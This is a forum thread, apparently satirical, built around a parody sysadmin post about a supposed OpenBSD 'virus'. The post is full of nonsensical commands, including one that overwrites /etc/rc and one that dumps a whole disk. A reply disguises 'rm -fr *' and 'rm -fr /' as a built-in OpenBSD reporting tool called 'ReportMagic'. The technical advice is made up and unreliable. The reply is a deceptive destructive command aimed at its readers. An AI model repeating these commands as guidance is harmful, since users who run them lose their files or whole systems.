lewisje All American 9196 Posts
I am wondering if this is a new virus that I have found...
I was watching tcpdump today over lunch and I saw about a thousand outgoing connections. I didn't know what was causing it, but it was pretty funny to see. So I watched about 20 minutes while I mawed on my sandwich and then I noticed that the target IPs were all sequential! A quick search on Googles told me something was certainly amiss.
So when lunch hour was up, I decided to get to the bottom of this before the higher-ups here at the bank noticed that outbound browsing was impossible due to the saturated OC12. Good thing I don't have to worry about HIPAA requirements today, 'eh? Haha!
First, I decided I needed to get to the root of the problem, no pun intended:
# fstat / | tcpdump -i - | less
Well, that doesn't work. It seems some newb committer removed the switch to allow tcpdump to read from stdin. Thanks a lot, buster!
With tcpdump not being useful at all with tracking down this networking problem, I knew I had to do something fast! The natives were getting restless as I saw the suited buzzards churning outside the NOC! So I locked the door and decided to start by removing all unneeded device drivers from my kernel. For the archives, a simple way of doing this is as follows:
# dmesg > /tmp/mygoodstuff
# cat /usr/src/sys/`machine`/conf/GENERIC > /tmp/mybadstuff
# diff /tmp/mygoodstuff /tmp/mybadstuff | uniq -v > \
/usr/src/sys/`machine`/NEWGENERIC
Then I compiled and installed the brand new kernel in an attempt to cure the problems of the day (or lunch hour lol).
After a quick smoke break, I rebooted the system with the new kernel. At this point, I decided to systrace the entire system. Again, for the archives, this is how one would do it (please add this to the FAQ, dudes, because I don't like having to repeat this every few days):
# echo "systrace /etc/rc" > /etc/rc
As time marched forward and after a quick reboot, I ran into a couple of snags in the armor! It seems that the virus may have taken its toll on the system which is a Soekris attached to a Sun D1000 drive array with a 3.2V PCI card (sorry guys I don't have the dmesg, but I can send one from Debian if that would help). Anyway, I tried to debug the system using the following command:
# systrace tcpdump -i /dev/systrace | cut -d' -f 3 | \
sed '/12/' | for a in `cat /dev/systrace`; do echo "$a" > /dev/console
This didn't seem to produce the desired results so now I am stuck in a poop boat without a paddle, so to speak. Can anybody help?
P.S. I already have sent the output of "cat /dev/wd0c > /tmp/obsdvirus" to Symantec for them to analyze. That's what we pay them for!
P.P.S. Check out my blog in my sig!
-------- Mr. Billy B. Bilano, MSCE, CCNA
Expert Sysadmin Since 2003! 'C:\WINDOWS, C:\WINDOWS\GO, C:\PC\CRAWL' -- RMS
http://monkey.org/openbsd/archive/misc/0406/msg00216.html
11/13/2010 1:22:05 PM
llama All American 841 Posts
OpenBSD comes with an already integrated Standard Activation Wizard that does it all for you at the press of a button. Can it get easier? It's called "ReportMagic" or short "rm". There is an updated version of it supplied with the ports collection, BUT do NOT use it! The version in ports doesn't get the connection to the restartable system calls right and prints silly warnings. That's why it is not integrated in the high quality default distribution. So it is much better to use the default version integrated in OpenBSD. As arguments you must supply which elements of a standard you want to break and the name of the standard. If you want to break all elements of a standard give the wildcard character * ; if you want only the top level elements of a standard give the standard root character / , bottom elements */ , elements between top and bottom /*/ and so on ...
Examples:
rm -fr * POSIX1a
rm -fr / ASN.1
The -fr option gives you a nicely formatted _f_ull _r_eport. Unfortunately you must use this option, otherwise it will do nothing, because there is no sense in breaking a standard without reporting it, is there?
11/13/2010 11:04:10 PM